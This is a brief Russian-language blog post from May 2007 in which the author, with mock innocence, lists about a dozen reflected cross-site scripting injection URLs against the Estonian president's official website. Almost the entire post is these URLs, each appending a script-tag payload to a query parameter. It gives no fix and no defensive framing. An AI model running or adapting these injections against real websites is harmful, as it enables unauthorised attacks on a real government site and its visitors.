18 Мая, 2007

Президент эстонии

eston_gandon
Залез тут на сайт хакера и заметил заметку об XSS на сайте президента эстонии.
Случайно, непреднамеренно и без злого умысла обнаружил еще с десяток подобных дыр на его сайте

_http://www.president.ee/et/ametitegevus/?arhiiv=true&aasta=2007"><script></script>
_http://www.president.ee/et/ametitegevus/?gid=94518"><script>alert()</script>
_http://www.president.ee/show.image.php?gid="><script>alert()</script>
_http://www.president.ee/en/duties/?arhiiv=true&aasta=2007"><script>alert()</script>
_http://www.president.ee/en/duties/speeches.php?arhiiv=true&aasta=2007"><script>alert()</script>
_http://www.president.ee/et/institutsioonid/?gid=8192"><script>alert()</script>
_http://www.president.ee/et/president/?gid=8188"><script>alert()</script>
_http://www.president.ee/et/ametitegevus/?gid=94481"><script>alert()</script>
_http://www.president.ee/et/vabariik/?gid="><script>alert()</script>
_http://www.president.ee/en/estonia/constitution.php?gid=81910"><script>alert()</script>
_http://www.president.ee/et/president/proua_k6ned.php?arhiiv=true&aasta=2007"><script>alert()</script>

comments powered by Disqus